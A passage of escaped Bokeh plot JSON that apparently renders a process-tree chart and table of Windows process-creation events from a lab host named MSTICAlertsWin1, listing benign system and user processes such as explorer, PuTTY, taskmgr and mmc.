"1628\",\"type\":\"DataRange1d\"},{\"attributes\":{},\"id\":\"1698\",\"type\":\"StringEditor\"},{\"attributes\":{\"text\":{\"field\":\"cmd\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1602\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1603\"}}},\"id\":\"1606\",\"type\":\"Text\"},{\"attributes\":{\"ticks\":[1,2,3,4,5,6,7,8]},\"id\":\"1623\",\"type\":\"FixedTicker\"},{\"attributes\":{},\"id\":\"1694\",\"type\":\"StringEditor\"},{\"attributes\":{\"data_source\":{\"id\":\"1563\"},\"glyph\":{\"id\":\"1598\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1599\"},\"selection_glyph\":null,\"view\":{\"id\":\"1601\"}},\"id\":\"1600\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"end\":31,\"start\":-1},\"id\":\"1630\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1697\",\"type\":\"StringFormatter\"},{\"attributes\":{\"axis\":{\"id\":\"1636\"},\"grid_line_color\":null,\"ticker\":null},\"id\":\"1639\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1632\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1634\",\"type\":\"LinearScale\"},{\"attributes\":{\"editor\":{\"id\":\"1694\"},\"field\":\"SubjectLogonId\",\"formatter\":{\"id\":\"1695\"},\"title\":\"SubjectLogonId\"},\"id\":\"1675\",\"type\":\"TableColumn\"},{\"attributes\":{\"range\":{\"id\":\"1571\"},\"value\":-0.2},\"id\":\"1603\",\"type\":\"Dodge\"},{\"attributes\":{\"end\":31,\"start\":10},\"id\":\"1571\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1575\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1644\",\"type\":\"PanTool\"},{\"attributes\":{},\"id\":\"1573\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1714\",\"type\":\"BasicTicker\"},{\"attributes\":{\"below\":[{\"id\":\"1636\"}],\"center\":[{\"id\":\"1639\"},{\"id\":\"1643\"}],\"left\":[{\"id\":\"1640\"}],\"plot_height\":700,\"plot_width\":90,\"renderers\":[{\"id\":\"1662\"}],\"title\":{\"id\":\"1688\"},\"toolbar\":{\"id\":\"1651\"},\"toolbar_location\":null,\"x_range\":{\"id\":\"1628\"},\"x_scale\":{\"id\":\"1632\"},\"y_range\":{\"id\":\"1630\"},\"y_scale\":{\"id\":\"1634\"}},\"id\":\"1627\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"text\":\"ProcessTree (color bar = {legend_col})\"},\"id\":\"1567\",\"type\":\"Title\"},{\"attributes\":{\"end\":11,\"start\":1},\"id\":\"1569\",\"type\":\"Range1d\"},{\"attributes\":{\"axis\":{\"id\":\"1577\"},\"grid_line_alpha\":0.1,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":{\"id\":\"1625\"}},\"id\":\"1580\",\"type\":\"Grid\"},{\"attributes\":{\"axis_line_color\":null,\"formatter\":{\"id\":\"1713\"},\"major_label_standoff\":0,\"major_tick_line_color\":\"navy\",\"ticker\":{\"id\":\"1582\"},\"visible\":false},\"id\":\"1581\",\"type\":\"LinearAxis\"},{\"attributes\":{\"axis\":{\"id\":\"1581\"},\"dimension\":1,\"grid_line_color\":\"navy\",\"ticker\":null,\"visible\":false},\"id\":\"1584\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1582\",\"type\":\"BasicTicker\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"TimeGenerated\":\"datetime\"},\"renderers\":[{\"id\":\"1600\"}],\"tooltips\":[[\"Process\",\"@NewProcessName\"],[\"PID\",\"@PID\"],[\"CmdLine\",\"@CommandLine\"],[\"SubjUser\",\"@SubjectUserName\"],[\"SubjLgnId\",\"@SubjectLogonId\"],[\"TargLgnId\",\"@TargetLogonId\"],[\"Time\",\"@TimeGenerated{%F %T}\"]]},\"id\":\"1594\",\"type\":\"HoverTool\"},{\"attributes\":{\"below\":[{\"id\":\"1577\"}],\"center\":[{\"id\":\"1580\"},{\"id\":\"1584\"}],\"left\":[{\"id\":\"1581\"}],\"outline_line_color\":null,\"plot_height\":700,\"plot_width\":900,\"renderers\":[{\"id\":\"1600\"},{\"id\":\"1607\"},{\"id\":\"1614\"},{\"id\":\"1621\"}],\"right\":[{\"id\":\"1565\"}],\"title\":{\"id\":\"1567\"},\"toolbar\":{\"id\":\"1589\"},\"toolbar_location\":\"above\",\"x_range\":{\"id\":\"1569\"},\"x_scale\":{\"id\":\"1573\"},\"y_range\":{\"id\":\"1571\"},\"y_scale\":{\"id\":\"1575\"}},\"id\":\"1566\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5},\"id\":\"1665\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"source\":{\"id\":\"1563\"}},\"id\":\"1663\",\"type\":\"CDSView\"},{\"attributes\":{\"range\":{\"id\":\"1569\"},\"value\":1.75},\"id\":\"1596\",\"type\":\"Dodge\"},{\"attributes\":{\"axis_line_color\":null,\"formatter\":{\"id\":\"1716\"},\"major_label_standoff\":0,\"major_tick_line_color\":\"navy\",\"ticker\":{\"id\":\"1623\"},\"visible\":false},\"id\":\"1577\",\"type\":\"LinearAxis\"},{\"attributes\":{\"text\":\"\"},\"id\":\"1688\",\"type\":\"Title\"},{\"attributes\":{\"overlay\":{\"id\":\"1665\"},\"x_range\":null,\"y_range\":{\"id\":\"1571\"}},\"id\":\"1664\",\"type\":\"RangeTool\"},{\"attributes\":{\"editor\":{\"id\":\"1692\"},\"field\":\"SubjectUserSid\",\"formatter\":{\"id\":\"1693\"},\"title\":\"SubjectUserSid\"},\"id\":\"1674\",\"type\":\"TableColumn\"},{\"attributes\":{\"range\":null,\"value\":-0.5},\"id\":\"1658\",\"type\":\"Dodge\"},{\"attributes\":{\"data\":{\"Account\":[\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\"],\"ClusterSize\":{\"__ndarray__\":\"AAAAAAAA+H8AAAAAAAAQQAAAAAAAABBAAAAAAAAAEEAAAAAAAADwPwAAAAAAABRAAAAAAAAAGEAAAAAAAAAYQAAAAAAAABRAAAAAAAAAM0AAAAAAAAAAQAAAAAAAAABAAAAAAAAA8D8AAAAAAAAAQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAIQAAAAAAAAAhAAAAAAAAACEAAAAAAAAAIQAAAAAAAAAhAAAAAAAAACEAAAAAAAAAIQAAAAAAAADJAAAAAAAAAMUAAAAAAAAAIQAAAAAAAAPA/AAAAAAAACEAAAAAAAAAUQAAAAAAAABRA\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"CommandLine\":[\"NaN\",\"\\\\SystemRoot\\\\System32\\\\smss.exe 000000d8 0000007c \",\"%SystemRoot%\\\\system32\\\\csrss.exe ObjectDirectory=\\\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16\",\"winlogon.exe\",\"\\\"fontdrvhost.exe\\\"\",\"\\\"dwm.exe\\\"\",\"\\\"LogonUI.exe\\\" /flags:0x0 /state0:0xa3fdc855 /state1:0x41c64e6d\",\"\\\"LogonUI.exe\\\" /flags:0x0 /state0:0xa3a7d855 /state1:0x41c64e6d\",\"\\\"dwm.exe\\\"\",\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 3160 -s 1392\",\"C:\\\\Windows\\\\system32\\\\userinit.exe\",\"C:\\\\Windows\\\\Explorer.EXE\",\"\\\"C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\\\" \",\"\\\"C:\\\\Program Files (x86)\\\\Internet Explorer\\\\IEXPLORE.EXE\\\" SCODEF:30680 CREDAT:82945 /prefetch:2\",\"\\\"C:\\\\Windows\\\\System32\\\\msiexec.exe\\\" /i \\\"C:\\\\Users\\\\MSTICAdmin\\\\Downloads\\\\putty-64bit-0.70-installer.msi\\\" \",\"\\\"C:\\\\Program Files\\\\PuTTY\\\\putty.exe\\\" \",\"putty\",\"putty\",\"putty\",\"\\\"C:\\\\Windows\\\\system32\\\\taskmgr.exe\\\" /4\",\"\\\"C:\\\\Windows\\\\System32\\\\NOTEPAD.EXE\\\" C:\\\\Diagnostics\\\\WinBenignActivity.cmd\",\"\\\"C:\\\\Windows\\\\system32\\\\taskmgr.exe\\\" /4\",\"\\\"C:\\\\Windows\\\\System32\\\\NOTEPAD.EXE\\\" C:\\\\Diagnostics\\\\SimulateAttack.cmd\",\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\" \",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\taskmgr.exe\\\" /4\",\"\\\"C:\\\\Windows\\\\system32\\\\CompMgmtLauncher.exe\\\" \",\"\\\"C:\\\\Windows\\\\system32\\\\ServerManager.exe\\\" \",\"\\\"C:\\\\Windows\\\\system32\\\\mmc.exe\\\" \\\"C:\\\\Windows\\\\system32\\\\compmgmt.msc\\\" /s\",\"\\\"C:\\\\Windows\\\\system32\\\\mmc.exe\\\" \\\"C:\\\\Windows\\\\system32\\\\taskschd.msc\\\" /s\"],\"Computer\":[\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\"],\"EffectiveLogonId\":[\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x2e2017\",\"0x106b46b\",\"0x3e7\",\"0x3e7\",\"0x2dca48\",\"0x2dca48\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\"],\"EffectiveLogonId_par\":[\"NaN\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x2dca48\",\"0x3e7\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\"],\"EventID\":[4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688],\"Exe\":[\"smss.exe\",\"smss.exe\",\"csrss.exe\",\"winlogon.exe\",\"fontdrvhost.exe\",\"dwm.exe\",\"LogonUI.exe\",\"LogonUI.exe\",\"dwm.exe\",\"WerFault.exe\",\"userinit.exe\",\"explorer.exe\",\"iexplore.exe\",\"iexplore.exe\",\"msiexec.exe\",\"putty.exe\",\"putty.exe\",\"putty.exe\",\"putty.exe\",\"Taskmgr.exe\",\"notepad.exe\",\"Taskmgr.exe\",\"notepad.exe\",\"cmd.exe\",\"conhost.exe\",\"Taskmgr.exe\",\"CompMgmtLauncher.exe\",\"ServerManager.exe\",\"mmc.exe\",\"mmc.exe\"],\"IsBranch\":[false,true,false,true,false,false,false,false,true,false,true,true,true,false,false,true,false,true,false,false,false,false,false,true,false,false,true,false,false,false],\"IsLeaf\":[false,false,true,false,true,true,true,true,false,true,false,false,false,true,true,false,true,false,true,true,true,true,true,false,true,true,false,true,true,true],\"IsRoot\":[true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false],\"Level\":[1,2,3,3,4,4,4,4,4,5,4,5,6,7,7,6,7,7,8,6,6,6,6,6,7,6,6,7,6,6],\"NewProcessId\":[\"0x12c\",\"0x1384\",\"0x1354\",\"0x12ec\",\"0x7c6c\",\"0x2cac\",\"0x3470\",\"0xc7c\",\"0xc58\",\"0x75c4\",\"0x89c\",\"0xcb0\",\"0x77d8\",\"0x6e04\",\"0x7ea8\",\"0x7084\",\"0x34a0\",\"0x752c\",\"0x7990\",\"0x6d30\",\"0x3820\",\"0x5f84\",\"0x61d0\",\"0x4878\",\"0x51fc\",\"0x18c4\",\"0x1758\",\"0x1784\",\"0x1470\",\"0xe8c\"],\"NewProcessId_par\":[\"NaN\",\"0x12c\",\"0x1384\",\"0x1384\",\"0x12ec\",\"0x12ec\",\"0x12ec\",\"0x12ec\",\"0x12ec\",\"0xc58\",\"0x12ec\",\"0x89c\",\"0xcb0\",\"0x77d8\",\"0x77d8\",\"0xcb0\",\"0x7084\",\"0x7084\",\"0x752c\",\"0xcb0\",\"0xcb0\",\"0xcb0\",\"0xcb0\",\"0xcb0\",\"0x4878\",\"0xcb0\",\"0xcb0\",\"0x1758\",\"0xcb0\",\"0xcb0\"],\"NewProcessName\":[\"C:\\\\Windows\\\\System32\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\fontdrvhost.exe\",\"C:\\\\Windows\\\\System32\\\\dwm.exe\",\"C:\\\\Windows\\\\System32\\\\LogonUI.exe\",\"C:\\\\Windows\\\\System32\\\\LogonUI.exe\",\"C:\\\\Windows\\\\System32\\\\dwm.exe\",\"C:\\\\Windows\\\\System32\\\\WerFault.exe\",\"C:\\\\Windows\\\\System32\\\\userinit.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\"C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\",\"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\"C:\\\\Program Files\\\\PuTTY\\\\putty.exe\",\"C:\\\\Program Files\\\\PuTTY\\\\putty.exe\",\"C:\\\\Program Files\\\\PuTTY\\\\putty.exe\",\"C:\\\\Program Files\\\\PuTTY\\\\putty.exe\",\"C:\\\\Windows\\\\System32\\\\Taskmgr.exe\",\"C:\\\\Windows\\\\System32\\\\notepad.exe\",\"C:\\\\Windows\\\\System32\\\\Taskmgr.exe\",\"C:\\\\Windows\\\\System32\\\\notepad.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\Taskmgr.exe\",\"C:\\\\Windows\\\\System32\\\\CompMgmtLauncher.exe\",\"C:\\\\Windows\\\\System32\\\\ServerManager.exe\",\"C:\\\\Windows\\\\System32\\\\mmc.exe\",\"C:\\\\Windows\\\\System32\\\\mmc.exe\"],\"NewProcessName_par\":[\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\dwm.exe\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\userinit.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\"C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Program Files\\\\PuTTY\\\\putty.exe\",\"C:\\\\Program Files\\\\PuTTY\\\\putty.exe\",\"C:\\\\Program Files\\\\PuTTY\\\\putty.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\System32\\\\CompMgmtLauncher.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\"],\"PID\":[\"PID: 0x12c (300)\",\"PID: 0x1384 (4996)\",\"PID: 0x1354 (4948)\",\"PID: 0x12ec (4844)\",\"PID: 0x7c6c (31852)\",\"PID: 0x2cac (11436)\",\"PID: 0x3470 (13424)\",\"PID: 0xc7c (3196)\",\"PID: 0xc58 (3160)\",\"PID: 0x75c4 (30148)\",\"PID: 0x89c (2204)\",\"PID: 0xcb0 (3248)\",\"PID: 0x77d8 (30680)\",\"PID: 0x6e04 (28164)\",\"PID: 0x7ea8 (32424)\",\"PID: 0x7084 (28804)\",\"PID: 0x34a0 (13472)\",\"PID: 0x752c (29996)\",\"PID: 0x7990 (31120)\",\"PID: 0x6d30 (27952)\",\"PID: 0x3820 (14368)\",\"PID: 0x5f84 (24452)\",\"PID: 0x61d0 (25040)\",\"PID: 0x4878 (18552)\",\"PID: 0x51fc (20988)\",\"PID: 0x18c4 (6340)\",\"PID: 0x1758 (5976)\",\"PID: 0x1784 (6020)\",\"PID: 0x1470 (5232)\",\"PID: 0xe8c (3724)\"],\"ParentProcessName\":[\"NaN\",\"C:\\\\Windows\\\\System32\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\dwm.exe\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\userinit.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\"C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Program Files\\\\PuTTY\\\\putty.exe\",\"C:\\\\Program Files\\\\PuTTY\\\\putty.exe\",\"C:\\\\Program Files\\\\PuTTY\\\\putty.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\System32\\\\CompMgmtLauncher.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\"],\"ProcessId\":[\"NaN\",\"0x12c\",\"0x1384\",\"0x1384\",\"0x12ec\",\"0x12ec\",\"0x12ec\",\"0x12ec\",\"0x12ec\",\"0xc58\",\"0x12ec\",\"0x89c\",\"0xcb0\",\"0x77d8\",\"0x77d8\",\"0xcb0\",\"0x7084\",\"0x7084\",\"0x752c\",\"0xcb0\",\"0xcb0\",\"0xcb0\",\"0xcb0\",\"0xcb0\",\"0x4878\",\"0xcb0\",\"0xcb0\",\"0x1758\",\"0xcb0\",\"0xcb0\"],\"ProcessId_par\":[\"NaN\",\"NaN\",\"0x12c\",\"0x12c\",\"0x1384\",\"0x1384\",\"0x1384\",\"0x1384\",\"0x1384\",\"0x12ec\",\"0x1384\",\"0x12ec\",\"0x89c\",\"0xcb0\",\"0xcb0\",\"0x89c\",\"0xcb0\",\"0xcb0\",\"0x7084\",\"0x89c\",\"0x89c\",\"0x89c\",\"0x89c\",\"0x89c\",\"0xcb0\",\"0x89c\",\"0x89c\",\"0xcb0\",\"0x89c\",\"0x89c\"],\"Rarity\":{\"__ndarray__\":\"AAAAAAAA+H8AAAAAAADQPwAAAAAAANA/AAAAAAAA0D8AAAAAAADwP5qZmZmZmck/VVVVVVVVxT9VVVVVVVXFP5qZmZmZmck/KK+hvIbyqj8AAAAAAADgPwAAAAAAAOA/AAAAAAAA8D8AAAAAAADgPwAAAAAAAPA/AAAAAAAA8D9VVVVVVVXVP1VVVVVVVdU/VVVVVVVV1T9VVVVVVVXVP1VVVVVVVdU/VVVVVVVV1T9VVVVVVVXVPxzHcRzHcaw/Hh4eHh4erj9VVVVVVVXVPwAAAAAAAPA/VVVVVVVV1T+amZmZmZnJP5qZmZmZmck/\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"Row\":[30,29,28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1],\"SourceComputerId\":[\"NaN\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\"],\"SubjectDomainName\":[\"NaN\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\"],\"SubjectLogonId\":[\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\"],\"SubjectUserName\":[\"NaN\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\"],\"SubjectUserSid\":[\"NaN\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\"],\"TargetLogonId\":[\"NaN\",\"0x0\",\"0x0\",\"0x0\",\"0x2e2017\",\"0x106b46b\",\"0x0\",\"0x0\",\"0x2dca48\",\"0x2dca48\",\"0x2e2017\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"